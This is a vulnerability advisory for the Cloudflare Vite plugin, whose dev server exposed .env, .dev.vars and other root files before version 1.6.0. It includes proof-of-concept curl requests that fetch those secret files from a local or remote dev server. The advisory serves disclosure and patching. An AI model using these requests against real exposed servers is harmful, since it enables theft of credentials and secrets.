GHSA-4pfg-2mw5-f8jx
Vulnerability from github
Published
2025-07-08 19:07
Modified
2025-09-19 15:35
Severity ?
6.9 (Medium) - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
Summary
Cloudflare Vite plugin exposes secrets over the built-in dev server
Details

Summary

Note: originally posted on H1 but closed. Cross-posting over to here in abundance of caution instead of a public issue.

When utilising the Cloudflare Vite plugin in its default configuration, all files are exposed by the local dev server, including files in the root directory that contain secret information such as: - .env - .dev.vars

PoC

  1. Create a Workers project that utilises the @cloudflare/vite-plugin. For example:
  2. npm create cloudflare@latest - select Framework Starter -> React
  3. Add any secret files to test if they're accessible. echo foobar=secret > .dev.vars for example
  4. Run npm run dev to start the dev server (after running npm ci if necessary to install dependencies) and then hit the following to expose information:

curl http://localhost:5173/.env may expose any secrets in this file curl http://localhost:5173/.dev.vars may expose any secrets in this file curl http://localhost:5173/package.json may expose dependencies used by the project, potentially leading to other vulnerabilities curl http://localhost:5173/README.md may expose internal documentation

Impact

If the vite dev server is exposed on a public network, such as when a user simply uses wrangler to serve their application and doesn't publish to Cloudflare in production, an attacker may be able to acquire secrets that the user doesn't wish to be exposed.

Another common scenario where this could happen is when sharing previews of an application using cloudflared. npm run dev -> share preview with cloudflared -> now all secrets are exposed to the public internet.

Exposing via vite is possible via:

npm run dev -- -- --host 0.0.0.0

The default configuration has no reason to expose information outside of the configured assets directory.

Example:

curl http://somehost/.env may expose secrets curl http://somehost/.dev.vars may expose secrets curl http://somehost/package.json may expose dependencies used by the project, potentially leading to other vulnerabilities curl http://somehost/README.md may expose internal documentation

etc.

Information disclosure to anyone on the same network, or if the dev server is exposed such as via cloudflared as explored here: https://github.com/cloudflare/workers-sdk/discussions/3455#discussioncomment-6165773

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@cloudflare/vite-plugin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59427"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-08T19:07:47Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nNote: [originally posted on H1](https://hackerone.com/reports/3117837) but closed. Cross-posting over to here in abundance of caution instead of a public issue. \n\nWhen utilising the Cloudflare Vite plugin in its default configuration, all files are exposed by the local dev server, including files in the root directory that contain secret information such as:\n- `.env`\n- `.dev.vars`\n\n### PoC\n1. Create a Workers project that utilises the `@cloudflare/vite-plugin`. For example:\n   - `npm create cloudflare@latest` - select Framework Starter -\u003e React\n2. Add any secret files to test if they\u0027re accessible. `echo foobar=secret \u003e .dev.vars` for example\n3. Run `npm run dev` to start the dev server (after running `npm ci` if necessary to install dependencies) and then hit the following to expose information:\n\n`curl http://localhost:5173/.env` may expose any secrets in this file\n`curl http://localhost:5173/.dev.vars` may expose any secrets in this file\n`curl http://localhost:5173/package.json` may expose dependencies used by the project, potentially leading to other vulnerabilities\n`curl http://localhost:5173/README.md` may expose internal documentation\n\n### Impact\n\nIf the vite dev server is exposed on a public network, such as when a user simply uses `wrangler` to serve their application and doesn\u0027t publish to Cloudflare in production, an attacker may be able to acquire secrets that the user doesn\u0027t wish to be exposed. \n\nAnother common scenario where this could happen is when sharing previews of an application using `cloudflared`. `npm run dev` -\u003e share preview with `cloudflared` -\u003e now all secrets are exposed to the public internet.\n\nExposing via vite is possible via:\n\n```\nnpm run dev -- -- --host 0.0.0.0\n```\n\nThe default configuration has no reason to expose information outside of the configured assets directory.\n\nExample:\n\n`curl http://somehost/.env` may expose secrets\n`curl http://somehost/.dev.vars` may expose secrets\n`curl http://somehost/package.json` may expose dependencies used by the project, potentially leading to other vulnerabilities\n`curl http://somehost/README.md` may expose internal documentation\n\netc.\n\nInformation disclosure to anyone on the same network, or if the dev server is exposed such as via `cloudflared` as explored here: https://github.com/cloudflare/workers-sdk/discussions/3455#discussioncomment-6165773",
  "id": "GHSA-4pfg-2mw5-f8jx",
  "modified": "2025-09-19T15:35:01Z",
  "published": "2025-07-08T19:07:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cloudflare/workers-sdk/security/advisories/GHSA-4pfg-2mw5-f8jx"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cloudflare/workers-sdk/commit/0e500720bf70016fa4ea21fc8959c4bd764ebc38"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cloudflare/workers-sdk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Cloudflare Vite plugin exposes secrets over the built-in dev server"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.